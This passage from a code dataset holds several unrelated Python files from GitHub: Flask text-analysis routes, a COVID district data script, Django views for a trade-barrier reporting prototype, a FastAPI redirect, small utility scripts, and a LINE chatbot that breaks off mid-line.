READER\n# -----------\n\n@app.route('/reader', methods=['GET', 'POST'])\ndef reader_main_page():\n\n\t# Clean, unify later\n\tcredentials = { 'dbname': 'reader_keywords', 'dbuser': 'luke'} # TEMP: into a file.\n\tkeywords_table_name = 'keywords_test'\n\tkeywords_columns_types = \t[\n\t\t\t\t\t\t\t\t\t#('id serial', 'PRIMARY KEY'),\n\t\t\t\t\t\t\t\t\t('set_name', 'text'),\n\t\t\t\t\t\t\t\t\t('keyword', 'text'),\n\t\t\t\t\t\t\t\t\t# ...\n\t\t\t\t\t\t\t\t]\n\n\tDBM = DataBaseManager(credentials, keywords_table_name, keywords_columns_types)\n\tRF = ReaderForm()\n\t\n\tlink_validation = RF.link_field.validate(RF)\n\tselect_validation = RF.select.validate(RF)\n\n\tif select_validation and not link_validation:\n\t\tset_name = RF.select.data\n\t\tkeywords = DBM.get_set_keywords(set_name)\n\t\treturn render_template('reader.html', title='Reader', reader_form=RF, keywords=keywords)\n\n\tif link_validation and select_validation:\n\n\t\t\n\t\t##### Universal Base.\n\t\tset_name = RF.select.data\n\t\tkeywords = DBM.get_set_keywords(set_name)\n\t\tkeywords = [k.lower() for k in keywords]\n\t\tfull_text = get_input_text(RF.link_field.data)\n\n\t\t# Computation costs reduction - further fix.\n\t\tif RF.reader_mode_select.data == 'Keyword sentences + hints':\n\t\t\tREADER_MODE_FRAME_TYPE = 'Full'\t\t\n\t\t# elif RF.reader_mode_select.data == 'Keyword sentences':\n\t\t# \tREADER_MODE_FRAME_TYPE = 'Handy'\n\t\telse:\n\t\t\tREADER_MODE_FRAME_TYPE = 'Full'\n\n\t\t# General statistics:\n\t\t# --------------------------------------------------------\n\n\t\t# Word counts\n\t\tgeneral_word_counts = text_values_counts_dict(full_text)\n\n\t\t# Full text sentiment [useless?]\n\t\tfull_text_sentiment = text_sentiment(full_text) # int \n\t\t\n\n\t\t# TextFrame ( future: CompCost minimalization: df types (handy, spec, lightweight)\n\t\t# - Text to sentences frame\n\t\t# - Feature Engineering\n\t\t# ---------------------\n\n\t\t# Frame with a raw and cleaned sentences.\n\t\tTTF = TextToFrame(full_text, keywords)\n\t\tdf_sentences = TTF.prepare_sentence_dataframe()\n\n\t\t# Dataframe with defined features pick.\n\t\tTTE = TextFeatureEngineering(df_sentences, keywords)\n\t\tdf = TTE.run(READER_MODE_FRAME_TYPE)\n\n\t\t# Sentences with a keyword\n\t\tkeyword_sentences = get_sentences_with_keyword(df)\n\n\n\n\n\t\t# DataFrame to Results: Minimalization\n\t\t# ------------------------------------\n\n\t\t# Keywords display.\n\t\tkeywords_display = ', '.join([k for k in keywords if k != ''])\n\n\n\t\t# Features out\n\n\t\t# N nouns display.\n\t\tif RF.nouns_display.data == True:\n\t\t\tn_nouns = RF.nouns_amount.data\n\t\t\tnouns = select_n_most_occuring_phrases(df, 'nouns', general_word_counts, n_nouns)\n\t\telse:\n\t\t\tnouns = None\n\n\t\t# N entities display.\n\t\tif RF.ent_display.data == True:\n\t\t\tn_ent = RF.ent_amount.data\n\t\t\tents_org = select_n_most_occuring_phrases(df, 'ent_org', general_word_counts, n_ent)\n\n\t\t\t# ents org sentiment test:\n\t\t\tall_sentences = sent_tokenize(full_text) \n\t\t\tphrases_group = ents_org.split(', ')\n\t\t\tents_org_sent = phrases_sentiment_in_respect_to_full_text(all_sentences, phrases_group)\n\t\t\tfor k, v in ents_org_sent.items():\n\t\t\t\tprint(k, v)\n\n\t\t\tents_p = select_n_most_occuring_phrases(df, 'ent_person', general_word_counts, n_ent)\n\t\t\tents_gpe = select_n_most_occuring_phrases(df, 'ent_gpe', general_word_counts, n_ent)\n\t\t\tents_norp = select_n_most_occuring_phrases(df, 'ent_norp', general_word_counts, n_ent)\n\t\telse:\n\t\t\tents_org, ents_p, ents_gpe, ents_norp = None, None, None, None\n\t\t\tents_org_sent = {}  # keep defined: the graphs branch below reads it even when entity stats are off\n
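\t\t# For reference, the sentiment helpers above reduce to TextBlob's polarity\n\t\t# score (TextBlob is imported at the top of this module); a one-line check:\n\t\tassert -1.0 <= TextBlob('a short example sentence').sentiment.polarity <= 1.0\n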
\n\t\t\n\n\t\tif RF.summary_display.data == True:\n\t\t\tsummary_part = True\n\t\telse:\n\t\t\tsummary_part = None\n\t\t\n\n\n\n\n\t\tif RF.graphs_display.data == True:\n\t\t\tfig1 = plot_word_counts(general_word_counts, 10)\n\t\t\tfig3 = plot_words_sent(ents_org_sent)\n\t\t\tgraph_test = '/static/images/word_counts_graph_xx.png' # Recode\n\t\t\tgraph_test3 = '/static/images/word_counts_graph_xx3.png' # Recode\n\t\t\tgraphs = [graph_test, graph_test3]\n\t\telse:\n\t\t\tgraphs = None\n\n\n\n\t\t# Render template display\n\t\tfeatured_sentences = []\n\t\tfor i in range(len(df)):\n\t\t    idx = i\n\t\t    is_sent = df.loc[i, 'keywords']\n\t\t    words = str(df.loc[i, 'named_ents_nouns'])\n\t\t    sent = str(df.loc[i, 'sentence'])\n\t\t    featured_sentence = [idx, is_sent, words, sent]\n\t\t    featured_sentences.append(featured_sentence)\n\n\n\n\t\t#reader_frame_type_validation = RF.reader_frame_select.data\n\t\treader_frame = RF.reader_mode_select.data\n\t\tif RF.reader_mode_select.data == 'Keyword sentences + hints':\n\t\t\tsentences_html = sentences_to_spanned_html(featured_sentences)\n\t\telif RF.reader_mode_select.data == 'Keyword sentences':\n\t\t\tsentences_html = sentences_to_html(featured_sentences)\n\n\n\n\n\n\t\treturn render_template('reader.html', title='Reader', spanned_test=sentences_html, reader_form=RF, summary_part=summary_part, graphs=graphs, keywords=keywords_display, ks=keyword_sentences, eo=ents_org, nn=nouns, ep=ents_p, eg=ents_gpe, en=ents_norp)\n\n\t# Display link contents [from above]. Graphs\n\t# Modify content according to the settings.\n\n\treturn render_template('reader.html', title='Reader', reader_form=RF)\n\n\n\n\n# 4. COMPARER.\n# ------------\n\n@app.route('/form', methods=['GET', 'POST'])\ndef input_data():\n\n\tclass DataFromURL():\t\n\t\tdef get_raw_page_contents(self, link):\n\t\t\thtml = urllib.request.urlopen(link).read()\n\t\t\tsoup = BeautifulSoup(html, \"lxml\")\n\t\t\treturn soup\n\t\tdef run(self, link):\n\t\t\tout = self.get_raw_page_contents(link)\n\t\t\treturn out\n\n\tscraper = DataFromURL()\n\tform = CompareForm()\n\n\tif form.validate_on_submit():\n\n\t\t\n\t\tlink_1 = form.input_link1.data\n\t\tlink_2 = form.input_link2.data\n\t\t\n\t\t# GET DATA\n\n\t\tlink_1_contents = scraper.run(link_1)\n\t\tlink_2_contents = scraper.run(link_2)\n\n\t\t# PREPARE\n\n\t\t# UPLOAD TO DB - OPTIONAL FOR NOW\n\n\t\t# THROUGH A MODEL\n\n\t\t# GET OUTPUT\n\n\t\t# VISUALISE\n\n\t\t# SHOW RESULTS\n\n\t\tdata_out = {\n\t\t'link1' : link_1,\n\t\t'link2' : link_2,\n\t\t'link1_contents' : link_1_contents,\n\t\t'link2_contents' : link_2_contents,\n\t\t}\n\t\treturn render_template('result.html', title='Result', data_out=data_out) # hmm.\n\n\telse:\n\t\tflash('Link 1 and Link 2 are required')\n\t\treturn render_template('form.html', title='Compare', form=form)","repo_name":"Hiurge/reader-parts","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"70105796586","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport requests\n\n\n\ncode = 'MH' #State name\ndata = requests.get('https://api.covid19india.org/v4/min/timeseries-{}.min.json'.format(code)) #API\ndata = data.json()\n\ndef transform_func(x, ATTR_type, i):\n    if pd.isnull(x):\n        return 0\n    else:\n        val = x[ATTR_type][i]\n        return val\n    \n\n#Create single scalar dataframe for selected datatype\ndef 
create_TxN_df(dict_data, ATTR_type, ATTR_val):\n    df = pd.DataFrame.from_dict(dict_data) # bug fix: build the frame from the parameter, not the caller's local ALL_DISTRICT_DATA\n    \n    if ATTR_val == 'confirmed':\n        i = 0\n        \n    elif ATTR_val == 'deceased':\n        i = 1\n        \n    elif ATTR_val == 'recovered':\n        i = 2\n        \n    else:\n        raise ValueError('unknown ATTR_val: {}'.format(ATTR_val)) # guard: i would otherwise be undefined below\n        \n    for col in df.columns:\n        df[col] = df[col].apply(lambda x: transform_func(x, ATTR_type, i))\n        \n    return df\n\n\ndef get_data_by_district(district_name, SKIP_START=0, SKIP_END=0, TOTAL_LEN=444):\n    #district_name = 'Akola'\n    data_per_day = data[code]['districts'][district_name]['dates'] \n    # node feature vector data for each day\n\n    ATTR_LIST = ['confirmed', 'deceased', 'recovered', 'vaccinated1', 'vaccinated2']\n    ALL_KEYS = ['delta', 'delta7', 'total']\n\n    DISTRICT_INFO_DICT = {}\n\n    ctr = 0\n    for date in data_per_day:\n        ctr+=1\n        if ctr<=SKIP_START:\n            continue\n        if ctr >= TOTAL_LEN - SKIP_END:\n            continue\n        \n        day_data = data_per_day[date]\n\n        daily_info_dict = {}\n\n        for key in ALL_KEYS:\n            daily_info_dict[key] = []\n            for attr in ATTR_LIST:\n                daily_info_dict[key].append(day_data.get(key, {}).get(attr, 0))\n\n        DISTRICT_INFO_DICT[date] = daily_info_dict\n    \n    return DISTRICT_INFO_DICT, min(DISTRICT_INFO_DICT.keys()), max(DISTRICT_INFO_DICT.keys())\n\n\ndef get_all_data(ATTR_type, ATTR_val):\n    # GET dataframe of cases for all cities\n    init_skip_val = 15\n    end_skip_val = 1\n\n    DISTRICT_NAMES = ['ahmednagar', 'akola', 'amravati', 'aurangabad', 'beed',\n       'bhandara', 'buldhana', 'chandrapur', 'dhule', 'gadchiroli',\n       'gondia', 'hingoli', 'jalgaon', 'jalna', 'kolhapur', 'latur',\n       'mumbai', 'nagpur', 'nanded', 'nandurbar', 'nashik', 'osmanabad',\n       'palghar', 'parbhani', 'pune', 'ratnagiri', 'sangli', 'satara',\n       'sindhudurg', 'solapur', 'thane', 'wardha', 'washim', 'yavatmal']\n\n    SKIP_DISTRICTS = ['Gadchiroli', 'Wardha']\n\n    ALL_DISTRICT_DATA = dict()\n\n    ctr = 0\n    for NAME in DISTRICT_NAMES:\n        NAME = NAME.title().strip()\n        if NAME in SKIP_DISTRICTS:\n            print(\"Skipping: \", NAME)\n            continue\n\n        ALL_DISTRICT_DATA[NAME], min_val, max_val = get_data_by_district(NAME, SKIP_START=init_skip_val, SKIP_END=end_skip_val)\n\n        print(NAME, \": \", len(ALL_DISTRICT_DATA[NAME].keys()), \" | \", min_val, max_val)\n        print('---'*4)\n\n    print(\"--------------------------------\")\n    print(\"All Districts: \", len(ALL_DISTRICT_DATA.keys()))\n    \n    vector_df = create_TxN_df(ALL_DISTRICT_DATA, ATTR_type, ATTR_val)\n    pd.DataFrame(vector_df.values).to_csv('data/train/road_traffic/covid/vel.csv', header=False, index=False) #Save file\n\n    # create adjacency matrix\n    df_adj = pd.read_csv('adjacency_matrix.csv')\n    df_adj = df_adj[~df_adj['city1'].isin([x.lower() for x in SKIP_DISTRICTS])]\n    df_adj = df_adj[~df_adj['city2'].isin([x.lower() for x in SKIP_DISTRICTS])]\n    df_adj['distance'] = df_adj['distance']/ max(df_adj['distance'])\n    adj_finl_data = df_adj.pivot_table('distance', ['city1'], 'city2')\n\n    print(os.getcwd())\n\n    pd.DataFrame(adj_finl_data.values).to_csv('data/train/road_traffic/covid/adj_mat.csv', header=False, index=False) #Save file","repo_name":"ayushchopra96/covid-gnn-1mg","sub_path":"create_datasets.py","file_name":"create_datasets.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18578133590","text":"#program to print sum of numbers in a list\r\ndef sum(numbers): # note: shadows Python's built-in sum\r\n    total = 0\r\n    for x in numbers:\r\n        total += x\r\n    return total\r\nprint(\"The sum is:\")\r\nprint(sum((2, 4, 6, 8, 10, 12)))\r\n\r\n#program to find max b/w three numbers\r\ndef max2( x, y ):\r\n    if x > y:\r\n        return 
x\r\n return y\r\ndef max3( x, y, z ):\r\n return max2( x, max2( y, z ) )\r\nprint(\"The max number is:\")\r\nprint(max3(20, 7, -5))\r\n\r\n\r\n","repo_name":"harsh22chauhan/Python-Projects","sub_path":"basic codes/funlist.py","file_name":"funlist.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38519275657","text":"from fastapi import FastAPI, HTTPException\nfrom fastapi.responses import RedirectResponse\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\nclass SlugModel(BaseModel):\n slug: str\n\n@app.get(\"/{slug}\")\nasync def redirect_to_substack(slug: str):\n if not slug:\n raise HTTPException(status_code=400, detail=\"Empty slug not allowed\")\n substack_url = f\"https://substack.com/{slug}\"\n return RedirectResponse(url=substack_url)","repo_name":"djquesadilla/shubstack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14128889635","text":"############\n## Solution\n############\n# sample n_frozen_trials state sequences\nXf = np.zeros(T, dtype=int)\nXf[0] = (psi.cumsum() > np.random.rand()).argmax()\nfor t in range(1, T):\n Xf[t] = (A[Xf[t - 1],:].cumsum() > np.random.rand()).argmax()\n\n# switch to one-hot encoding of the state\nXf = np.eye(K, dtype=int)[Xf] # (T,K)\n\n# get the Y values\nRates = np.squeeze(L @ Xf[...,None]) * dt # (T,C)\nRates = np.tile(Rates, [n_frozen_trials,1,1]) # (n_trials, T, C)\nYf = ss.poisson(Rates).rvs() ","repo_name":"ddinesan/Neuroscience","sub_path":"tutorials/W2D3_DecisionMaking/solutions/W2D3_Tutorial2_Solution_83cea173.py","file_name":"W2D3_Tutorial2_Solution_83cea173.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39772363664","text":"# marketaccess/views.py\n\nimport json\nimport requests\nfrom mptt.templatetags.mptt_tags import cache_tree_children\n\nfrom django.core.paginator import Paginator\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.shortcuts import HttpResponse\nfrom django.urls import reverse_lazy\nfrom django.views.generic import (\n View, TemplateView, FormView, ListView, DetailView\n)\n\nfrom api_client import api_client\nfrom .helpers import (\n store_companies_house_profile_in_session_and_validate,\n has_company\n)\nfrom .models import (\n BarrierNotification, BarrierRecord, BarrierSource,\n BarrierReport, BarrierCountry, BarrierType\n)\nfrom .forms import BarrierCountryForm, ReportBarrierForm\n\nfrom sso.utils import SSOSignUpRequiredMixin\n\nclass HomeView(TemplateView):\n template_name = 'home.html'\n\n def get_context_data(self, **kwargs):\n context = super(HomeView, self).get_context_data(**kwargs)\n user = self.request.sso_user\n context['user'] = user\n context['user_has_company'] = (\n user and has_company(user.session_id)\n )\n context['num_barriers'] = BarrierRecord.objects.count\n return context\n\nclass GovUKView(TemplateView):\n template_name = 'govuk.html'\n pass\n\nclass GovUKDITView(TemplateView):\n template_name = 'govuk-dit.html'\n pass\n\nclass PrototypesView(TemplateView):\n template_name = 'prototypes.html'\n pass\n\nclass ReportBarrierView(FormView):\n template_name = 'report-barrier.html'\n form_class = BarrierCountryForm\n\n countries = ''\n\n def get(self, request, *args, **kwargs):\n # we're reporting a new barrier, so 
clear\n # any existing barriers from the session\n if 'existingbarrier' in request.session:\n del request.session['existingbarrier']\n if 'existingnotification' in request.session:\n del request.session['existingnotification']\n return super(ReportBarrierView, self).get(request, *args, **kwargs)\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(ReportBarrierView, self).form_valid(form)\n\n\nclass ReportExistingBarrierView(FormView):\n template_name = 'report-barrier-existing.html'\n form_class = BarrierCountryForm\n\n countries = ''\n\n def get(self, request, *args, **kwargs):\n self.barrier = BarrierRecord.objects.get(pk = kwargs['pk'])\n request.session['existingbarrier'] = self.barrier.pk\n if 'existingnotification' in request.session:\n del request.session['existingnotification']\n return super(ReportExistingBarrierView, self).get(request, *args, **kwargs)\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(ReportExistingBarrierView, self).form_valid(form)\n\n def get_context_data(self, *args, **kwargs):\n context = super(ReportExistingBarrierView, self).get_context_data(*args, **kwargs)\n context['barrier'] = self.barrier\n return context\n\n\nclass ReportExistingNotificationView(FormView):\n template_name = 'report-barrier-existing.html'\n form_class = BarrierCountryForm\n\n countries = ''\n\n def get(self, request, *args, **kwargs):\n self.notification = BarrierNotification.objects.get(pk = kwargs['pk'])\n request.session['existingnotification'] = self.notification.pk\n if 'existingbarrier' in request.session:\n del request.session['existingbarrier']\n return super(ReportExistingNotificationView, self).get(request, *args, **kwargs)\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(ReportExistingNotificationView, self).form_valid(form)\n\n def get_context_data(self, *args, **kwargs):\n context = super(ReportExistingNotificationView, self).get_context_data(*args, **kwargs)\n context['barrier'] = self.notification\n return context\n\n\nclass SearchView(FormView):\n template_name = 'search.html'\n form_class = ReportBarrierForm\n\n countries = ''\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(SearchView, self).form_valid(form)\n\n\nclass SearchResultsView(ListView):\n template_name = 'search-results.html'\n country_text = ''\n country_object = None\n model = BarrierRecord\n context_object_name = 'uk_barriers'\n paginate_by = 10 # page size for default queryset ie UK barrier reports\n EC_NOTIFICATIONS_PAGE_SIZE = 5\n WTO_NOTIFICATIONS_PAGE_SIZE = 5\n\n def __init__(self, *args, **kwargs):\n self.uk_source = BarrierSource.objects.get(short_name='UK')\n #self.wto_source = BarrierSource.objects.get(short_name='WTO')\n self.ec_source = BarrierSource.objects.get(short_name='EC MADB')\n return super(SearchResultsView, self).__init__(*args, **kwargs)\n\n def dispatch(self, request, *args, **kwargs):\n self.countries_search_text = request.GET.getlist('countries')\n self.product_search_text = request.GET.get('s', None)\n self.sector_search_text = request.GET.get('sectors', 
None)\n self.commoditycode_search_text = request.GET.get('commoditycodes', None)\n self.uk_barriers_page_number = kwargs.get('page', 1)\n return super(SearchResultsView, self).dispatch(request, *args, **kwargs)\n\n def get_queryset(self, *args, **kwargs):\n self.uk_barriers = BarrierRecord.objects.order_by('pk') # BarrierRecord doesn't need to be filtered\n self.ec_notifications = BarrierNotification.objects.filter(barrier_source=self.ec_source).order_by('pk')\n if self.countries_search_text:\n countries = []\n try:\n for country in self.countries_search_text:\n country_object = BarrierCountry.objects.get(name__iexact=country)\n countries.append(country_object)\n except BarrierCountry.DoesNotExist:\n self.uk_barriers = []\n self.ec_notifications = []\n else:\n self.uk_barriers = self.uk_barriers.filter(country__in=countries)\n self.ec_notifications = self.ec_notifications.filter(country__in=countries)\n if self.product_search_text:\n self.uk_barriers = self.uk_barriers.filter(\n Q(title__icontains=self.product_search_text)\n | Q(description__icontains=self.product_search_text)\n )\n self.ec_notifications = self.ec_notifications.filter(\n Q(title__icontains=self.product_search_text)\n | Q(description__icontains=self.product_search_text)\n | Q(products_text__icontains=self.product_search_text)\n )\n return self.uk_barriers\n\n def get_context_data(self, **kwargs):\n context_data = super(SearchResultsView, self).get_context_data(**kwargs)\n context_data['countries'] = self.countries_search_text\n context_data['products'] = self.product_search_text\n context_data['sector'] = self.sector_search_text\n # uk_barriers will be created by default\n context_data['ec_notifications'] = Paginator(self.ec_notifications, self.EC_NOTIFICATIONS_PAGE_SIZE).page(1)\n #context_data['wto_barriers'] = Paginator(self.wto_barriers, self.WTO_NOTIFICATIONS_PAGE_SIZE).page(1)\n return context_data\n\n\nclass BarrierDetailView(DetailView):\n model = BarrierRecord\n template_name = 'barrier-detail.html'\n\n\nclass SessionContextMixin(object):\n def post(self, *args, **kwargs):\n return self.get(*args, **kwargs)\n\n def get_context_data(self, *args, **kwargs):\n context = super(SessionContextMixin, self).get_context_data(*args, **kwargs)\n if 'existingbarrier' in self.request.session:\n existing_barrier_id = self.request.session['existingbarrier']\n context['existingbarrier'] = BarrierRecord.objects.get(pk=existing_barrier_id)\n if 'existingnotification' in self.request.session:\n existing_notification_id = self.request.session['existingnotification']\n context['existingnotification'] = BarrierNotification.objects.get(pk=existing_notification_id)\n if 'is_trade_association' in self.request.session:\n context['is_trade_association'] = self.request.session['is_trade_association']\n if 'logged_in' in self.request.session:\n context['logged_in'] = self.request.session['logged_in']\n return context\n\n\nclass NotificationDetailView(DetailView):\n model = BarrierNotification\n template_name = 'notification-detail.html'\n\nclass BarrierTypeDetailView(SessionContextMixin, DetailView):\n model = BarrierType\n template_name = 'barrier-type-detail.html'\n\nclass BarrierSubscribeView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barrier-subscribe.html'\n\nclass BarriersGeneralInfoView(SessionContextMixin, ListView):\n model = BarrierType\n template_name = 'barriers-general-info.html'\n\n def get_queryset(self):\n uk_source = BarrierSource.objects.get(short_name='UK')\n return 
BarrierType.objects.filter(barrier_source=uk_source)\n\nclass BarriersCaseStudyView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barriers-case-study1.html'\n\nclass BarriersCaseStudy2View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barriers-case-study2.html'\n\nclass BarriersCaseStudy3View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barriers-case-study3.html'\n\nclass ReportBarrierTaskListView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-task-list.html'\n\nclass ReportBarrierStep1View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step1.html'\n\nclass ReportBarrierStep2View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step2.html'\n\n def post(self, request, *args, **kwargs):\n if 'dit[step1][type]' in self.request.POST:\n if request.POST['dit[step1][type]'] == 'I work for a trade association':\n request.session['is_trade_association'] = True\n elif 'is_trade_association' in request.session:\n # Allow it to be turned off again\n del request.session['is_trade_association']\n return self.get(request, *args, **kwargs)\n\n\nclass ReportBarrierStep3View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step3.html'\n\nclass ReportBarrierStep4View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step4.html'\n # https://django-mptt.github.io/django-mptt/tutorial.html#template\n\n def get_context_data(self, *args, **kwargs):\n context = super(ReportBarrierStep4View, self).get_context_data(*args, **kwargs)\n # warning - this will need to change if we change\n # the code of the UK barrier source\n uk_source = BarrierSource.objects.get(short_name='UK')\n uk_barrier_types = BarrierType.objects.filter(barrier_source=uk_source)\n context['barrier_types'] = uk_barrier_types\n return context\n\nclass ReportBarrierStep5View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step5.html'\n\nclass ReportBarrierStep6View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step6.html'\n\nclass ReportBarrierStep7View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step7.html'\n\nclass ReportBarrierRegisterView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-register.html'\n\nclass ReportBarrierLoginView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-login.html'\n\nclass ReportBarrierLogoutView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-logout.html'\n\n def dispatch(self, request, *args, **kwargs):\n if 'logged_in' in request.session:\n request.session['logged_in'] = False\n return super(ReportBarrierLogoutView, self).dispatch(request, *args, **kwargs)\n\nclass ReportBarrierSaveView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-save.html'\n\n def dispatch(self, request, *args, **kwargs):\n if 'logged_in' in request.GET:\n request.session['logged_in'] = True\n return super(ReportBarrierSaveView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(ReportBarrierSaveView, self).get_context_data(**kwargs)\n 
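# Editorial note (added; not part of the original source): the elif ladder below\n        # marks every step up to and including context['step'] as complete. A sketch of\n        # an equivalent loop, assuming 'step' is always a small numeric string:\n        #   for s in range(1, int(context['step']) + 1):\n        #       context['completed_%d' % s] = 'true'\n        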
context['logged_in'] = 'false'\n context['completed_1'] = 'false'\n context['completed_2'] = 'false'\n context['completed_3'] = 'false'\n context['completed_4'] = 'false'\n context['completed_5'] = 'false'\n context['completed_6'] = 'false'\n\n if context['step'] == '1':\n context['completed_1'] = 'true'\n elif context['step'] == '2':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n elif context['step'] == '3':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n elif context['step'] == '4':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n context['completed_4'] = 'true'\n elif context['step'] == '5':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n context['completed_4'] = 'true'\n context['completed_5'] = 'true'\n elif context['step'] == '6':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n context['completed_4'] = 'true'\n context['completed_5'] = 'true'\n context['completed_6'] = 'true'\n\n return context\n\nclass ReportBarrierSuccessView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-success.html'\n\nclass RequestFastTrackView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'request-fast-track.html'\n\nclass FastTrackPhoneTextView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'fast-track-phone-text.html'\n\nclass ExampleSummaryView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'example-summary.html'\n\nclass ThanksView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'thanks.html'\n\n\nclass CompaniesHouseRequestView(View):\n search_company = ''\n\n def get(self, request, *args, **kwargs):\n self.search_company = request.GET.get('company', '')\n api_response = requests.get(\n 'https://api.companieshouse.gov.uk/search/companies'\n '?q={}&items_per_page={}'\n .format(self.search_company, settings.COMPANIES_HOUSE_ITEMS_PER_PAGE),\n auth=(settings.COMPANIES_HOUSE_API_KEY, '')\n )\n kwargs['content_type'] = 'application/json'\n return HttpResponse(api_response.text, **kwargs)\n\n\nclass BarrierSubtypesLookupView(View):\n def get(self, request, *args, **kwargs):\n self.barrier_type = request.GET.get('barrier_type', '')\n api_response = ''\n if self.barrier_type:\n tree_node = BarrierType.objects.get(pk=self.barrier_type)\n tree_children_dict= tree_node.children_as_dict()\n kwargs['content_type'] = 'application/json'\n api_response = json.dumps(tree_children_dict)\n return HttpResponse(api_response, **kwargs)\n","repo_name":"uktrade/market-access-prototype","sub_path":"barriers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43483194616","text":"import sqlite3\n\nconnection = sqlite3.connect('email_schedule.db')\n\n\nwith open('sql/schema.sql') as f:\n connection.executescript(f.read())\n\ncur = connection.cursor()\n\ncur.execute(\"INSERT INTO email_recipient (id, email_address) VALUES (?, ?)\",\n (1, 'bagas.dewangkara@gmail.com')\n 
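# Added note: the (?, ?) placeholders are bound by sqlite3 itself, which\n            # avoids manual string interpolation in the INSERT statement\n            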
)\nconnection.commit()\nconnection.close()","repo_name":"Bagasdew/email_scheduler","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12593152586","text":"from flask import Flask, request, abort\nimport os\n\nfrom linebot import (\n    LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n    InvalidSignatureError\n)\nfrom linebot.models import (\n    MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\nflag = True\nactivate_ = False\n\n# Get the channel credentials from environment variables\nYOUR_CHANNEL_ACCESS_TOKEN = os.environ[\"YOUR_CHANNEL_ACCESS_TOKEN\"]\nYOUR_CHANNEL_SECRET = os.environ[\"YOUR_CHANNEL_SECRET\"]\n\nline_bot_api = LineBotApi(YOUR_CHANNEL_ACCESS_TOKEN)\nhandler = WebhookHandler(YOUR_CHANNEL_SECRET)\n\n@app.route(\"/\")\ndef hello_world():\n    return \"hello world!\"\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n    # get X-Line-Signature header value\n    signature = request.headers['X-Line-Signature']\n\n    # get request body as text\n    body = request.get_data(as_text=True)\n    app.logger.info(\"Request body: \" + body)\n\n    # handle webhook body\n    try:\n        handler.handle(body, signature)\n    except InvalidSignatureError:\n        abort(400)\n\n    return 'OK'\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n    global flag\n    global activate_\n\n    if event.message.text == '啟動地鼠': # activation trigger (rough translation: \"start the gopher\")\n        line_bot_api.reply_message(\n            event.reply_token,\n            TextSendMessage(text='我是 做了32年臨櫃 林桂翔'))\n        activate_ = True\n\n    if event.message.text == '地鼠88': # deactivation trigger (\"88\" is chat slang for \"bye-bye\")\n        line_bot_api.reply_message(\n            event.reply_token,\n            TextSendMessage(text='運動中心老師 有個淺規則 不能跟學員亂來'))\n        activate_ = False\n        return\n\n    if 